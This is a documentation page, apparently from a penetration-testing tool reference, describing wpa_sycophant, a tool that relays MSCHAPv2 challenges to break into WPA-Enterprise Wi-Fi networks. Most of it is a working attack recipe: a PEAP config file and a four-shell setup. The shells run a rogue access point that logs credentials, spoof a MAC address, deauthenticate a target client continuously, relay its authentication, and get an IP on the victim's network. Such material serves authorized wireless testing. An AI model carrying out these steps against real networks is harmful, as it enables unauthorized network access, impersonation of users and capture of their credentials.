Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

wpa_sycophant exploits a fundamental weakness in MSCHAPv2: the challenge and response can be relayed. When a victim connects to a rogue AP (run by berate_ap), wpa_sycophant forwards the AP’s challenge to the victim and relays their response to the real AP, authenticating as the victim without cracking the password. Works when the victim does not validate the server certificate.

Install

git clone https://github.com/sensepost/wpa_sycophant.git
cd wpa_sycophant

Usage

./wpa_sycophant.sh -c <config.conf> -i <interface>

Config File

network={
  ssid="<TARGET-SSID>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity=""
  anonymous_identity=""
  password=""
  eap=PEAP
  phase1="crypto_binding=0 peaplabel=0"
  phase2="auth=MSCHAPV2"
  bssid_blacklist=<ROGUE-AP-MAC>
}
bssid_blacklist must be set to the rogue AP’s MAC to prevent wpa_sycophant from connecting back to itself. If the relay fails, try: 
phase1="peapver=1"

Full Attack Setup

Shell 1, set rogue AP MAC and launch berate_ap: 
systemctl stop network-manager
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up

cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout output.log wlan1 lo <TARGET-SSID>
Shell 2, deauthenticate the target client: 
airmon-ng start wlan0
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng -0 0 wlan0mon -a <BSSID> -c <CLIENT-MAC>
Shell 3, start the relay: 
cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan2
Shell 4, get an IP once connected: 
dhclient wlan2 -v